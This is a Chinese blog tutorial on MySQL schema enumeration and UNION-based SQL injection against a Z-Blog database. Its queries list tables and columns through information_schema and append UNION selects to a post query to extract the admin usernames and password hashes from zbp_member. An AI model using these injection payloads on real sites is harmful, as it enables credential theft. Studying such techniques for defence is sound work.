首页 > 数据库 >MySQL数据库架构&SQL注入漏洞

MySQL数据库架构&SQL注入漏洞

时间:2023-03-01 14:23:43浏览次数:40  
标签:架构 log zblog MySQL SELECT SQL TABLE WHERE zbp

查找zblog数据库中有哪些表

SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.`TABLES` WHERE TABLE_SCHEMA='zblog';

查找目标表(zbp_category)中的字段

SELECT 6,COLUMN_NAME FROM information_schema.`COLUMNS` WHERE TABLE_NAME='zbp_member';

屏幕截图_20230224_170910

查找目标表中的目标数据(管理员用户名和密码)

SELECT mem_name,mem_password FROM zblog.zbp_member;

将代码中的可变量的SQL语句复制到数据库中

屏幕截图_20230224_172143

使用UNION语句替换掉原有查询结果,显示zblog数据库中的所有表。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.`TABLES` WHERE TABLE_SCHEMA='zblog';

使用UNION语句替换掉原有查询结果,显示zpb_member表中的所有字段。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT 6,COLUMN_NAME FROM information_schema.`COLUMNS` WHERE TABLE_NAME='zbp_member';

使用UNION语句替换掉原有查询结果,显示zpb_member表中的用户名和密码数据。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT mem_name,mem_password FROM zblog.zbp_member;

标签:架构,log,zblog,MySQL,SELECT,SQL,TABLE,WHERE,zbp
From: https://www.cnblogs.com/ly111/p/17168022.html

相关文章

  • 非交互式连接PostgreSQL
    方法一:.pgpass查看postgres家目录greppostgres/etc/passwdpostgres:x:114:119:PostgreSQLadministrator,,,:/var/lib/postgresql:/bin/bash创建.pgpasstouch/var/......
  • ubuntu20.04二进制部署PostgreSQL 15.2
    创建文件存储库配置echo"debhttp://apt.postgresql.org/pub/repos/apt$(lsb_release-cs)-pgdgmain">/etc/apt/sources.list.d/pgdg.list导入存储库签名密钥wget......
  • 国产计算机开发实践之环境搭建(Java+Mysql+Idea)
    操作系统:统信UOS/麒麟架构:aarch64(命令行uname-m查看)一、Java1.解压安装包(注:在安装包所在路径下输入命令)sudotar-zxvfjdk-8u271-linux-aarch64.tar.gz-C/usr/loca......
  • yum卸载mysql
    查找mysql安装的文件:rpm-qa|grep-imysql卸载查找出的文件:yumremove"文件名"查看是否卸载完成:rpm-qa|grep-imysql查找mysql相......
  • MySQL 查询常用操作(0) —— 查询语句的执行顺序
    MySQL中明确查询语句的执行顺序极其重要,了解执行顺序才不至于犯一些简单错误,例如having后面是否可以使用select中重命名的列名等问题。另外SQL中实际使用最频繁的就是查......
  • 利用python操作数据库MySQL
    一、python操作MySQL的库(包)1.PythonDatabasAPI   Python操作数据库的标准接口为PythonDatabasAPISpecificationV2.0,其定义了在python中操作数据库的方法......
  • 利用python将MySQL数据导出到excel中
    涉及到的相关库:   pymysql、   xlwt库函数(将MySQL一个数据表导出到excel文件的一个表)文件exportexcel.py内容:defexport_to_excel(worksheet,cursor......
  • 日志系统:一条SQL更新语句执行过程
    更新流程假如有个表和一条更新语句mysql>createtableT(IDintprimarykey,cint);mysql>updateTsetc=c+1whereID=2;更新语句会走一遍查询语句的流程,分析......
  • sql ytd 附python 实现方式
    ytd释义YTD分析属于同比分析类,其特点在于对比汇总值,即从年初第一日值一直至今的值累加。作用在于分析企业中长期的经营绩效。做法假定:有一张销量明细表date仓库s......
  • mysql中使用 when then 格式化查询结果
    mysql>select*fromuser;+----+------+------+|id|name|sex|+----+------+------+|1|张三|1||2|李四|1||3|张珊|0|+----......